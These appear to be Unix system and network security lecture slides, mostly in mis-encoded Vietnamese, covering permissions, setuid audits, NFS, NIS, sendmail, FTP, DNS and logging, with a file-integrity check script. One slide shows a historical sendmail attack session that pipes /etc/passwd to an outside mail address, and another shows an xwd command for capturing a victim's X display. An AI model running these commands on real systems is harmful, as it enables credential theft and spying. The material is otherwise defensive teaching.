File System Security

HEÄ THOÁNG TAÄP TIN CUÛA

UNIX
Ñoái vôùi heä ñieàu haønh UNIX,
khoâng coù khaùi nieäm caùc oå
ñóa khaùc nhau. Sau quaù trình
khôûi ñoäng, toaøn boä caùc thö
muïc vaø taäp tin ñöôïc ‘gaén ‘ leân
(mount) vaø taïo thaønh moät heä
thoáng taäp tin thoáng nhaát, baét
ñaàu töø goác ‘/’
 SUN OS File System

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

$ df -k
Filesystem kbytes used avail capacity Mounted on
/dev/dsk/c0t0d0s0 192799 131990 41530 77% /
/dev/dsk/c0t0d0s6 962983 477544 427661 53% /usr
/proc 0 0 0 0% /proc
fd 0 0 0 0% /dev/fd
/dev/dsk/c0t0d0s3 289207 115445 144842 45% /var
/dev/dsk/c0t0d0s5 465775 28807 390391 7% /opt
/dev/dsk/c0t0d0s7 1290127 233611 1004911 19% /other
/dev/dsk/c0t0d0s1 311983 203961 76824 73% /usr/openwin
swap 418136 120 418016 1% /tmp
/dev/dsk/c0t1d0s2 4124422 2359571 1723607 58% /squid
$
 Linux File System

[citd@server citd]$ df -k
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/sda1 447044 45006 378948 11% /
/dev/sda6 496627 119068 351909 25% /export
/dev/sda5 496627 405042 65935 86% /usr
/dev/sda7 492657 329963 137249 71% /var
[citd@server citd]$
/-------+
!-------/bin
!-------/sbin
!-------/usr-------/usr/bin
! !------/usr/sbin
! !------/usr/local
! !------/usr/doc
!
!-------/etc
!-------/lib
!-------/var-------/var/adm
!------/var/log
!------/var/spool
TÖÔNG ÖÙNG GIÖÕA DISK PARTITIONS
VAØ CAÁU TRUÙC TAÄP TIN

/ / /usr /usr/home

/usr
/squid

/usr/home
/mnt /mnt/cdrom
/squid

CD
GIÔÙI THIEÄU CAÙC THÖ MUÏC QUAN
TROÏNG CUÛA UNIX

/ (THÖ MUÏC GOÁC )

/bin
/sbin
/usr/bin
/usr/sbin
/var
/var/log
/var/adm
/home
/export/home (SUNOS)
Quyeàn vaø sôû höõu taäp tin vaø thö muïc cuûa
Unix
(directory and file permission and ownership)
Keát quaû cuûa leänh ls -l

-rw-r—r— 1 fido users 163 Dec 7 14:31 myfile

Khi moät taäp tin hay thö muïc ñöôïc taïo ra, noù mang owner vaø
group cuûa ngöôøi taïo ra noù. Phaàn quyeàn daønh cho user, group,
other phuï thuoäc vaøo giaù trò cuûa umask
Umask vaø caùc quyeàn truy nhaäp taäp tin

Ví duï :
[tnminh@pasteur tnminh]$ umask
002
[tnminh@pasteur tnminh]$ echo “tao mot file” > tmp
[tnminh@pasteur tnminh]$ ls -l
total 5472
-rw-rw-r-- 1 tnminh tnminh 13 Oct 3 21:55 tmp
[tnminh@pasteur /etc]$ umask 022
[tnminh@pasteur tnminh]$ echo “tao mot file khac”>tmp1
[tnminh@pasteur tnminh]$ ls -l
-rw-rw-r-- 1 tnminh tnminh 13 Oct 3 21:55 tmp
-rw-r--r-- 1 tnminh tnminh 18 Oct 3 21:59 tmp1
Daïng nhò phaân cuûa quyeàn truy nhaäp taäp
tin vaø thö muïc
Quyeàn truy nhaäp taäp tin chia thaønh ba nhoùm soá cho chuû nhaân (user),
nhoùm (group) vaø coøn laïi (others)
read permission 4
write permission 2
Execute permission 1
Nhö vaäy :
 0 or —-: No permissions at all
 4 or r—: read-only
 2 or -w-: write-only (rare)
 1 or —x: execute
 6 or rw-: read and write
 5 or r-x: read and execute
 3 or -wx: write and execute (rare)
 7 or rwx: read, write, and execute
Thay ñoåi caùc thuoäc tính cuûa taäp tin
vaø thö muïc
Caùch thay ñoåi töông ñoái :
 chmod g+w myfile  theâm khaû naêng write cho group cuûa myfile
 chmod o-x myfile  bôùt khaû naêng chaïy cuûa others cuûa myfile

Caùch thay ñoåi tuyeät ñoái :

 chmod 644 myfile => myfile seõ coù quyeàn rw-r--r--
Ñoái vôùi caùc admin, neân duøng caùch tuyeät ñoái vì noù an toaøn hôn.
Ñoái vôùi caùc thö muïc, thao taùc hoaøn toaøn töông ñöông.
chown cho pheùp ñoåi ngöôøi sôû höõu taäp tin,
Chgrp cho pheùp ñoåi nhoùm cuûa taäp tin,
 setuid vaø setgid bits
Set-user-id : Set-user-id nghóa laø khi chöông trình ñöôïc chaïy, noù seõ coù
quyeàn nhö ngöôøi chuû (owner) cuûa file cho duø ngöôøi goïi chöông trình laø
ai ñi nöõa.
Ví duï :
 $ ls –l /usr/sbin/sendmail
 rwsr-xr-x root root sendmail
Töông töï, set-group-id cho quyeàn chöông trình nhö group cuûa taäp tin chöông
trình.
Bit thöù 4 maõ giaù trò naøy. 4 = setuid; 2= setgid,
Neáu /bin/sh coù setuid bit set thì ai cuõng laø root vì owner cuûa /bin/sh laø
root vaø moïi user ñeàu duøng /bin/sh khi login  .
setgid cho thö muïc = taäp tin taïo ra trong thö muïc naøy coù cuøng group nhö
group cuûa thö muïc
Setuid cho taäp tin = khoâng coù taùc duïng
Sticky bit = user chæ coù quyeàn xoùa file do mình laø owner. Ví duï /tmp
 Baûo maät heä thoáng baèng kieåm tra setuid
vaø setgid bits
•Tìm taäp tin coù setuid bit set
•find / -perm -4000 -exec ls -l {} \;
•Töông töï cho setguid :
•Tìm taäp tin khoâng user
•find / -nouser -exec ls -l {} \;
•Tìm taäp tin vieát ñöôïc
•find / -perm –2 -print
•Tìm taäp tin khoâng sôû höõa
•find / -nouser -print
-r-s--x--x 1 root root 10704 Apr 15 1999 /usr/bin/passwd
-rws--x--x 2 root root 517916 Apr 7 1999 /usr/bin/suidperl
-rws--x--x 2 root root 517916 Apr 7 1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 root mail 64468 Apr 7 1999 /usr/bin/procmail
-rwsr-xr-x 1 root root 14036 Apr 16 1999 /usr/bin/rcp
-rwsr-xr-x 1 root root 10516 Apr 16 1999 /usr/bin/rlogin

•Chuù yù : Khoâng neân cho caùc shell script giaù trò setuid hay setgid. Neáu
chuùng ta caàn setuid, setgid, vieát chöông trình baèng C hay moät ngoân
ngöõ laäp trình töông ñöông.
Moät soá taäp tin "nguy hieåm". Trusted hosts
•/etc/hosts.equiv : Ngöôøi söû duïng töø moät maùy coù IP trong taäp tin
naøy, coù cuøng account name, coù theå söû duïng rlogin vaø rsh maø khoâng
caàn vaøo password treân maùy naøy. Raát may raèng root laø moät ngoaïi leä
.
•.rhosts : gioáng nhö /etc/hosts.equiv, nhöng kieåm tra host-user. Ñaëc bieät
user coù theå taïo .rhosts khoâng thoâng qua admin. Vì vaäy, neân hoaøn
toaøn caám vieäc taïo ra .rhosts taïi caùc thö muïc caù nhaân.
 Checksum vaø checklist
•Leänh sum cho pheùp xem xeùt xem taäp tin coù bò thay ñoåi veà noäi dung
hay khoâng. Ñieàu naøy giuùp chuùng ta phaùt hieän ñöôïc virus vì virus noùi
chung phaûi thay ñoåi noäi dung cuûa file.
•Neân chaïy sum taïi nhöõng thö muïc maø noäi dung khoâng thay ñoåi veà
nguyeèn taéc /sbin, /bin . Ghi laïi keát quaû vaøo moät taäp tin vaø söû duïng
sau naøy ñeå bieát nhöõng taäp tin coù checksum thay ñoåi.
•Checklist (thoâng qua leänh ls) cho pheùp tìm ra nhöõng thay ñoåi cuûa caùc
taäp tin heä thoáng. Chuùng ta, cuõng nhö checksum, neân taïo moät file
checklist ngay töø ñaàu. Baèng caùch naøy, chuùng ta seõ bieát ñöôïc caùc
taäp tin môùi taïo ra khoâng hôïp phaùp.
 Access Control List (ACL)
•Ñaây laø moät chuaån môùi cuûa Unix cho pheùp phaân quyeàn haïn truy
nhaäp vaøo heä thoáng taäp tin moät caùch chi tieát hôn heä thoáng cuûa Unix
truyeàn thoáng. Heä thoáng naøy cho pheùp ví duï caû group ggg coù quyeàn
ñoïc vaø user uuu cuûa group ggg naøy coù quyeàn ñoïc vaø vieát.
•Hai leänh cô baûn cuûa ACL laø getfacl vaø setfacl.
•Neáu chuùng ta boå sung ACL cho moät taäp tin, chuùng ta duøng leänh
•setfacl -m acl_entry_list filename
•ñeå bieát moät taäp tin coù söû duïng ACL, vôùi leänh ls -l ta coù
•-rw-r-----+ ..etc . Daáu + hieån thò raèng taäp tin söû duïng ACL
•Coù theå söû duïng ACL treân SUN OS 5.6
 Network File System (NFS)

NFS, the Network File System has three important characteristics:

 It makes sharing of files over a network possible.

 It mostly works well enough.

 It opens a can of security risks that are well understood by

crackers, and easily exploited to get access (read, write and delete)
to all your files.
Treân nguyeân taéc, NFS server tin NFS client vaø ngöôïc laïi. Do ñoù,
neáu NFS server hay client bò xaâm nhaäp seõ deã daøng daãn ñeán
söï xaâm nhaäp vaøo toaøn boä maïng NFS.
 NFS model
Server : eris. /etc/exports
/mn/eris/local apollon(rw)

Client : apollon
mount -o size=1024,wsize=1024 eris:/mn/eris/local /mnt
cd /mnt
ls –l
Or in /etc/fstab
# device mountpoint fs-type options dump fsckorder
eris:/mn/eris/local /mnt nfs rsize=1024,wsize=1024 0 0
 NFS Client Security

nosuid option : the server's root user cannot make a suid-root

program on the file system, log in to the client as a normal user and
then use the suid-root program to become root on the client.
 Remote Call Procedure (RPC)-based
services
- ñoái vôùi TCP, UDP protocols, port number coù 2 bytes (65536 max.)
- Moãi RPC-based coù moät RPC service number duy nhaát 4 bytes (4294 Mports
- portmapper ñôïi ôû coång 111 (TCP vaø UDP)
- khi moät RPC based server khôûi ñoäng, noù seõ chieám moät coång TCP hay UDP
port, sau ñoù thoâng baùo cho portmapper aùnh xaï giöõa soá RPC duy nhaát cuûa noù
vaø coâng TCP/UDP noù vöøa nhaän.
- khi moät RPC client muoán keát noái vôùi moät RPC-based server, noù “hoûi “
portmapper vaø ñöôïc bieát coång TCP ma ø RPC-based server ñang ñôïi.
- Client vaø server “queân “ portmapper vaø noái tröïc tieáp vôùi nhau.
- Keû xaâm nhaäp coù theå bypass portmapper
 NFS Server Security
•root_squash option : Now, if a user with UID 0 on the client attempts to access (read,
write, delete) the file system the server substitutes the UID of the
servers `nobody' account. Which means that the root user on the
client can't access or change files that only root on the server can
access or change.

Nhöng root cuûa client coù theå su thaønh bin hay adm vaø coù theå xaâm nhaäp vaøo
caùc taäp tin coù owner=bin treân server. Vì vaäy, nhöõng taäp tin binaries hay taäp
tin thöôøng quan troïng neân coù owner laø root.

•portmapper vaø nfsd coù theå coù vaán ñeà veà security, cho pheùp thaâm nhaäp traùi ph
vaøo Server file system. Ñeå khaéc phuïc sô hôû naøy caàn coù
portmap: ALL trong taäp tin /etc/hosts.deny vaø
portmap: 129.240.223.0/255.255.255.0 trong /etc/hosts.allow ñeå cho pheùp network
129.240.233.0 ñöôïc söû duïng portmapper
•Neáu /etc/exports chæ coù file system maø khoâng coù host, moïi host ñeàu coù quyeàn m
cuûa server.
 Network Information Service (NIS, NIS+)
SUN 1990
• NIS is a service that provides information, that has to be known
throughout the network, to all machines on the network. Information
likely to be distributed by NIS is:
· login names/passwords/home directories (/etc/passwd)
· group information (/etc/group)
If, for example, your password entry is recorded in the NIS passwd
database, you will be able to login on all machines on the network
which have the NIS client programs running.
• NIS+ is designed by Sun Microsystems Inc. as a replacement for NIS
with better security and better handling of large installations.
 NIS security problems

• Moät workstation tham gia vaøo NIS caàn phaûi coù taäp tin
/etc/passwd vôùi doøng cuoái cuøng nhö sau :
• +::0:0:::
• Hoaëc +:
Neáu ta duøng doøng moät vaø queân daáu +, ta seõ coù moät super-user
khoâng login name vaø khoâng password ;-(. Vì vaäy neân duøng
doøng leänh thöù hai)
• Neáu /etc/hosts.equiv chæ chöùa + thì taát caû caùc user cuûa taát caû
caùc host coù teân account nhö maùy naøy coù theå truy nhaäp
khoâng caàn password. Chuù yù moät soá Unix, keå caû SUN, caøi
hosts.equiv chæ vôùi moät doøng nhö vaäy ;-(
#!/bin/sh
#
# fscheck - check file system for insecurities
#
# This should be run as root
#
PATH=/usr/bin:/bin
export PATH

CHECKDIRS="/bin /etc /usr/bin /usr/etc /usr/lib /usr/ucb"

# ls.master is the file to create by command 'ls -alsgR $CHECKDIRS > ls.master
MASTER_LS=ls.master
# sum.master is the file to create by command 'find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > sum.master
MASTER_SUM=sum.master #
echo"Set-User-Id files found:"
find / -type f -a -perm -4000 -exec ls -aslg {} \;
echo ""
#
echo."Set-Group-Id files found:"
find / -type f -a -perm -2000 -exec ls -aslg {} \;
echo ""
#
#
echo"Device files not located in /dev :"
find / \( -type b -o -type c \) -print) | grep -v '^/dev'
echo ""
#
echo "World writable files and directories : "
find / -perm -2 -exec ls -aslgd {} \;
#
#
echo " Files owned by none xistents user or group :"
find / \( -nouser -o -nogroup \) -exec ls -aslgd {} \;
echo ""
#
#
ls -alsgR $CHECKDIRS > /tmp/lschk.$$
#
#
find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > /tmp/sumchk.$$
#
#
echo "Files in $CHECKDIRS whose attributes have changed : "
echo "< = master check list, > = current listing"
diff $MASTER_LS /tmp/lschk.$$
echo ""
#
#
echo "Files in $CHECKDIRS whose checksums have changed:"
echo "< = master check list, > = current listing"
diff $MASTER_SUM /tmp/sumchk.$$
rm -f /tmp/lschk.$$ /tmp/sumchk.$$
exit 0
 Baøi 3 : Network Service Security

• Treân ñaây, chuùng ta ñaõ ñeà caäp nhieàu ñeán baûo maät choáng
caùc xaâm nhaäp thoâng qua caùc ñieåm yeáu hay caùc loãi caøi ñaët
heä thoáng cuûa heä ñieàu haønh UNIX.
• Chuùng ta seõ chuyeån sang xem xeùt caùc xaâm nhaäp thoâng qua
caùc dòch maø maùy Unix môû ra cho maïng.
 Inetd vaø /etc/inet.conf

• inetd ñöôïc söû duïng ñeå khôûi ñoäng caùc daemon cung caáp caùc dòch vuï
maïng. inetd ñôïi caùc noái maïng sau moät soá coång. Khi coù yeâu caàu keát noái,
inetd seõ goïi chöông trình server töông öùng ñeå thieát laäp caùc keát noái.
• inetd seõ ñoïc file /etc/inetd.conf khi ñöôïc goïi leân boä nhôù .
• # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
• # Echo, discard, daytime, and chargen are used primarily for testing.
• # To re-read this file after changes, just do a 'killall -HUP inetd'
• #time stream tcp nowait root internal
• #time dgram udp wait root internal
• #
• # These are standard services.
• #
• ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
• telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
 Inetd vaø security

• /etc/inet.conf coù theå duøng ñeå giaûi quyeát moät soá vaán ñeà veà baûo maät nhö
sau :

- Neáu chuùng ta khoâng muoán söû duïng dòch vuï naøo, chuùng ta chæ vieäc ñôn
giaûn ñaët daáu # tröôùc doøng caáu hình keát noái ñoù. Vôùi nhöõng maùy tính
ñoøi hoûi baûo maät cao, quy taéc chung laø caám heát taát caû caùc dòch vuï maø
chuùng ta khoâng caàn hoaëc khoâng bieát.Trong tröôøng hôïp maùy hoaït ñoäng
khoâng bình thöôøng, chuùng ta boû daàn caùc chuù thích # vaø nhö vaäy chuùng
ta seõ hieåu chöùc naêng cuûa caùc dòch vuï.
- Caùc dòch vuï neân xem xeùt boû laø finger, tftp, talk
- Vôùi dòch vuï ñang coù vaán ñeà veà baûo maät nhöng khoâng caét ñi ñöôïc,
chuùng ta coù theå giaûm quyeàn cuûa dòch vuï baèng caùch thay thoâng tin trong
tröôøng user
 Email, SMTP vaø Sendmail

• - Email laø dòch vuï cô baûn vaø phoå bieán nhaát cuûa Internet. Giao
dieän duøng cho keát noái Email laø SMTP (Simple Mail Transfer
Protocol).
• - Sendmail laø moät SMTP server phoå bieán nhaát. Maëc duø
sendmail ñaõ bò nhieàu "tai tieáng " veà baûo maät trong lòch söû
phaùt trieån, nhöng ñeán hieän nay vaãn chöa coù moät chöông trình
naøo coù khaû naêng thay theá sendmail, nhaát laø veà maët tính
naêng. Nguyeân nhaân cuûa caùc bug cuûa sendmail laø vì sendmail
khaù daøi vaø phöùc taïp (#30.000 doøng leänh), ñoàng thôøi khi
chaïy treân boä nhôù, sendmail phaûi coù quyeàn nhö root ñeå thöïc
hieän nhieäm vuï cuûa mình. Tuy nhieân, do coù nhieàu ngöôøi söû
duïng sendmail, loãi cuûa sendmail seõ ñöôïc tìm ra raát nhanh
choùng vaø ñöôïc thoâng baùo roäng raõi cho pheùp söûa chöõa
nhanh choùng.
•
 2 con ñöôøng thaâm nhaäp qua Mail Server
Qua caùc leänh maø mail server nhaän töø ngoaøi : command channel attacks.
Morris worm ñaõ söû duïng con ñöôøng naøy baèng caùch söû duïng loãi debug cuûa sendm

ua noäi dung cuûa mail : data-driven attacks. Caùc chöông trình Mail Server ñeàu
duïng moät chöông trình mail local ñeå göûi/nhaän thö noäi boä cuûa maùy, giao dieän vô
ôøi söû duïng. Treân Unix, ñoù thöôøng laø /bin/mail. Neáu /bin/mail coù bug, keû xaâm
äp coù theå baét /bin/mail thöïc hieän caùc leänh ghi trong body cuûa mail.
ñieän tö ngaøy nay thöôøng laø Multimedia, do ñoù caàn nhöõng chöông trình ngoaøi ñeå
c “ thö. Chöông trình ngoaøi naøo “ñoïc “ thö vaø “ñoïc “ nhö theá naøo laø ngoaøi taàm
m soaùt cuûa caùc chöông trình mail coå ñieån. Ví duï nhö moät leã giaùng sinh, maïng cu
M bò teâ lieät bò phaûi göûi moät caùch töï ñoäng haøng trieäu mail coù nhaïc cuûa leã giaù
y caån thaän vôùi nhöõng thö vôùi noäi dung khuyeân baïn ñoåi password sang moät
word môùi töø admin, hay baùo cho nhaø baêng code caù nhaân cuûa card visa cuûa baïn.
 Kieåm tra sendmail ñang chaïy

•Caùc ñieåm caàn kieåm tra :

•Duøng version môùi. Caàn kieåm tra version cuûa sendmail vì moät soá version cuõ
coù vaán ñeà lieân quan tôùi baûo maät heä thoáng
•$ telnet pasteur.bvt.hcm 25
•220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35
+0700
Moät soá chöùc naêng wiz, debug khoâng ñöôïc coù
220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35 700
wiz
500 Command unrecognized: "wiz"
Debug
500 Command unrecognized: "debug"
Neáu debug set thì version sendmail cuûa baïn caàn phaûi thay
 Ví duï moät loãi cuûa sendmail

• telnet victim.com 25
• Trying 128.128.128.1 …
• Connected to victim.com
• Escape character is '^]'.
• 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
• Mail from : "|/bin/mail [email protected] < /etc/passwd"
• 250 "|/bin/mail [email protected] < /etc/passwd" … sender OK
• Rcpt to : nosuchuser
• 550 nosuchuser … User unknow
• Data
• 354 Enter mail, end with "." on a line by itself
• .
• 250 Mail accepted
• Quit
• Connection closed by foreign host.
• $
 FTP

• File Transfer Protocol ñöôïc thöïc hieän bôûi ftp vaø ftpd. Caàn söû duïng ftpd sau
1989
•Ñeå baûo maät ftp caàn caáu hình toát cho anonymous FTP
•taïo account ftp vaø * cho tröôøng password ñeå khoâng login
•taïo home directory cho account ftp (ví duï /home/ftp)
•thö muïc naøy owner =ftp vaø khoâng ai ñöôïc ghi
•chown ftp ~ftp
•chmod 555 ~ftp
•taïo caùc thö muïc bin,etc, usr tuøy thuoäc theo yeâu caàu cuûa Unix ñang söû
duïng vaø caùc thö muïc naøy ñeàu coù quyeàn 555
•cheùp taäp tin passwd vaø group vaøo ~ftp/etc. Xoùa taát caû caùc account, tröø
ftp. 2 taäp tin naøy coù quyeàn 444
 ftp (2)
• Cheùp ls vaøo ~ftp/bin vôùi quyeàn 111
• Taïo thö muïc ~ftp/pub vôùi quyeàn 577, owner ftp.
Anonymous connection seõ duøng ftp account.
• Hieän nay, neáuchuùng ta caøi ñaët wu-ftp, caùc quyeàn
cuûa caùc thö muïc naøy seõ ñöôïc laøm töï ñoäng
• Ví duï ftp config cuûa RedHat 6.0
• [tnminh@pateur /home]$ ls -l
• total 9
• drwxr-xr-x 6 root root 1024 Mar 21 1999 ftp
• drwxr-xr-x 2 root nobody 1024 Apr 16 1999 samba
 ftp (3)
• [tnminh@pateur /home]$ ls -l ftp
• total 4
• d--x--x--x 2 root root 1024 Nov 5 02:15 bin
• d--x--x--x 2 root root 1024 Nov 5 02:15 etc
• drwxr-xr-x 2 root root 1024 Nov 5 02:15 lib
• dr-xr-sr-x 2 root ftp 1024 Mar 21 1999 pub
• [tnminh@pateur /home]$
• [root@pateur etc]# more ~ftp/etc/passwd
• root:*:0:0:::
• bin:*:1:1:::
• operator:*:11:0:::
• ftp:*:14:50:::
• nobody:*:99:99:::
• [root@pateur etc]#
 ftp (4) : /etc/ftpusers
• /etc/ftpusers chöùa nhöõng account khoâng döôïc noái vaøo
qua ftp, ví duï nhö root, bin …
• Ví duï /etc/ftpusers cuûa Linux Redhat 6.0
• [root@pateur /tmp]# more /etc/ftpusers
• root
• bin
• daemon
• adm
• lp
• sync
•shutdown
•halt
•mail
•news
•uucp
•operator
•games
•nobody
•[root@pateur /tmp]#
•Taäp tin /etc/shells chöùa caùc shells
maø caùc user ñöôïc söû duïng nhö
bash, sh, ash, bsh ...
 tftp
• Do tftp khoâng ñoøi hoûi password, chuù yù vaán ñeà baûo maät
vôùi tftp.
• Tftp cuûa SUNOS tröôùc 4.0 coù loãi cho pheùp get caùc taäp tin,
ngay caû cuûa /etc. Caàn thay version naøy.
 Domain Name System (DNS)

• Loãi ñaàu tieân cuûa DNS laø DNS server vaø client khoâng
kieåm tra xem traû lôøi maø noù coù laø töø caùc server maø noù
hoûi hay töø moät nguoàn naøo ñoù .Server coù theå cache
nhöõng thoâng tin sai laïc naøy vaø söû duïng khi coù caâu hoûi.
• Ví duï, keû xaâm nhaäp coù theå noùi cho server IP cuûa maùy
cuûa hoï chính laø maùy maø baïn tin töôûng (trusted) vaø maùy
cuûa hoïc coù theå rlogin khoâng qua password.
• BIND Version 4.9 coù söûa ñöôïc loãi keå treân
• Treân moät soá OS (ví duï SUNOS 4.x), quaù trình lookup/double
reverse lookup ñöôïc töï ñoäng thöïc hieän. Töùc laø DNS seõ tìm
IP-> Name roài Name -> IP vaø kieåm tra 2 IP xem coù khôùp
khoâng. Tuy nhieân phöông phaùp naøy khoâng loaïi boû ñöôïc
hoaøn toaøn loãi cuûa DNS.
 Social Engineering attack
• DNS thöôøng cho raát nhieàu thoâng tin veà maïng noäi boä
nhö teân maùy, kieåu maùy … Keû xaâm nhaäp vôùi nhöõng
thoâng tin naøy coù maïo nhaän laø kyõ thuaät vieân baûo
haønh ñeán yeâu caàu ñöôïc coi maùy vaø coù theå hoûi
password
• Laøm sao khoâng cho keû xaâm nhaäp quaù nhieàu thoâng tin
? Coù phöông aùn laøm 2 DNS server; moät ñaët taïi trong
firewall vaø coù nhieàu thoâng tin. DNS thöù hai naèm ngoaøi
vaø chæ coù moät soá raát thoâng tin toái thieåu cho keát noái
cuûa maïng. Hai tröôøng HINFO vaø TXT thöôøng chöùa
nhieàu thoâng tin hoaøn toaøn chæ cho noäi boä .
 P Internet
A
C
K
Real DNS server E
T Fake DNS server

DNS F
Client I DNS Client
L
DNS Client T
E
R
 Setup fake and real servers
• Fake server laø primary server server cho domain cuûa baïn.
Primary server caàn phaûi coù ñuû thoâng tin veà caùc maùy
caàn noái tröïc tieáp ra Internet nhö www, ftp, news …
servers. Caùc thoâng tin phaûi cho pheùp laøm ñöôïc double
reverse lookup vì ngaøy nay raát phaùt trieån caùc ftp, mail
servers phuïc vuï chæ sau khi quaù trình double reverse lookup
thaønh coâng
• Real DNS server coù chöùa forwarders directive troû ra fake
server vaø real server laø slave server. Nhö vaäy real server seõ
hoûi fake server vôùi nhöõng address maø noù khoâng bieát.
• Real server coù theå coù taát caû caùc chi tieát veà maïng noäi boä
ñeå traû lôøi cho caùc DNS client trong maïng noäi boä maø
khoâng moät ngöôøi ngoaøi naøo coù theå tìm ñöôïc thoâng tin
naøy. Ngay caû DNS client cuûa maùy ngoaøi coù Fake DNS
server cuõng hoûi vaøo real server thoâng qua resolv.conf
 SYSLOG
/etc/syslog.conf|

The facility is one of the following keywords: auth, auth-priv, cron, daemon, kern, lpr,
mail, mark, news, security (same as auth), syslog, user, uucp and local0 through
local7. The keyword security should not be used anymore and mark is only for internal
use and therefore should not be used in applications. Anyway, you may want to specify
and redirect these messages here. The facility specifies the subsystem that produced the
message, i.e. all mail programs log with the mail facility (LOG_MAIL) if they log
using syslog.
The priority is one of the following keywords, in ascending order: debug, info, notice,
warning, warn (same as warning), err, error (same as err), crit, alert, emerg, panic (same
as emerg). The keywords error, warn and panic are deprecated and should not be used
anymore. The priority defines the severity of the message
Noùi chung, /var/adm/messages chöùa caùc thoâng tin lieân quan tôùi caùc quaù trình
logon. Ñaëc bieät caàn phaûi chuù yù ñeán phaàn login bôûi root. Neân coù quy taéc
chung laø login vôùi account thöôøng roài su khi caàn thieát ñeå bieát ai laø ngöôøi söû
duïng quyeàn root.
Coù theå config /etc/syslog.conf ñeå log caùc thoâng tin qua moät maùy khaùc.
 SYSLOG (2)
/etc/syslog.conf
# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.* /dev/console
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;news.none;authpriv.none /var/log/messages
# The authpriv file has restricted access.
authpriv.* /var/log/secure
# Log all the mail messages in one place.
mail.* /var/log/maillog
# Everybody gets emergency messages, plus log them on another
# machine.
*.emerg *
 /etc/syslog.conf
# Save mail and news errors of level err and higher in a
# special file.
uucp,news.crit /var/log/spooler
# Save boot messages also to boot.log
local7.* /var/log/boot.log
#
# INN
#
news.=crit /var/log/news/news.crit
news.=err /var/log/news/news.err
news.notice /var/log/news/news.notice
[root@pateur /tmp]#
 TCPDUMP
• tcpdump laø tieän ích cho pheùp theo doõi caùc moái noái
(connections). Ñaây laø moät coâng cuï raát maïnh cho pheùp
baûo trì maïng thoâng tin, ñoàng thôøi theo doõi neáu coù
caùc toan tính thaâm nhaäp.
• Moät soá options thöôøng duøng :
 Laáy thoâng tin treân maøn hình
• Baèng moät soá leänh, ngöôøi xaâm nhaäp coù theå cheùp
noäi dung cuûa maøn hình cuûa ngöôøi khaùc

• xwd -display victim:0 -root >screen.out

• xwud -in screen.out
 Summary
• Xem xeùt /etc/inetd.conf, boû caùc service khoâng caàn thieát,
nhaát laø treân caùc bastion host. Thay ñoåi user cuûa caùc
service thaønh caùc user "yeáu " hôn, ví duï finger chaïy vôùi
nobody,
• Kieåm tra kyõ caøi ñaët ftp, thöû khaû naêng write (upload)
cuûa anonymous ftp,
• Kieåm tra phieân baûn cuûa sendmail, /bin/mail, named,
finger, tftp,
• Caáu hình heä thoâng syslog
• Theo doõ caùc connection baèng tcpdump hoaëc chöông trình
töông ñöông